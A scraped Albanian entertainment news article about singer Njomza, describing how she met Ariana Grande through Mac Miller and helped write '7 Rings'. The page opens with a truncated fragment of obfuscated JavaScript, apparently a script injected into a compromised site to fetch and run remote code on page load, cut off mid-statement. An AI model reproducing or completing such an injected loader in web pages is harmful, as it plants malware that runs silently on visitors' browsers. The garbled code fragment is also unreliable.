;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Artistja e re shqiptare Njomza, tregon se si u njoftua me Ariana Grande dhe krijoi hitet e saj

By

Njomza u rrit në Chicago, Illinois. Të dy prindërit e saj janë nga Kosova, dhe Vitia flet rrjedhshëm shqip dhe anglisht. Njomza ka performuar në shfaqje talentesh që kur ishte pesë vjeç. Në moshën 14 vjeçare, ajo formoi një grup të quajtur “Scarlett”. Megjithatë në moshën 16 vjeçare, ajo u largua nga grupi për të ndjekur një karrierë solo. Pas kësaj Njomza filloi të publikojë covers në kanalin e saj në YouTube dhe disa nga këngët e saj origjinale.

Njomza u zbulua nga Mac Miller dhe nënshkroi kontratë në kompaninë e tij muzikore Most Dope. Pjesa tjetër mbetet histori e suksesit të saj muzikor.

Njomza Vitia është një nga sekretet e ruajtura më së miri nga muzika pop, duke shkruar për Ariana Grande këngë si Thank U, Next dhe 7 Rings.

Ajo ishte e ftuar së fundmi për të perfomuar në festivalin “Sunny Hill Festival”, në të cilën këngëtarja dhuroi një spektakël të vërtetë.

Më pas në një intervistë për “Ndrrimi i natës” artistja ka shpjeguar se si është njohur me Ariana Granden dhe si lindi me të një nga HIT-et më të mëdhaja për momentin “7 rings”.

Image result for njomza ariana grande

“Me Arianën jam njohur nga ish i dashuri i saj Mac Miller. Kam bërë disa këngë prove të cilat ia kam dërguar Mac dhe më pas ai më ka prezantuar me Arianën.”

“7 rings simbolizon 7 shoqet e ngushta të Arianës, të cilat punuan për të krijuar albumin e ri të saj. Në fillim kur mora vesh se do më përfshinte dhe mua i thashë se nuk ishte e nevojshme, por ajo këmbënguli, në këtë mënyrë i dhashë idenë të shkojmë në studio dhe të bëjmë një këngë për mënyrën luksoze të jetesës së saj dhe ja si u krijua kjo këngë.” – u shpreh Njomza. /Prive.al

Image result for njomza ariana grande

 

 

 

Artikuj të ngjashëm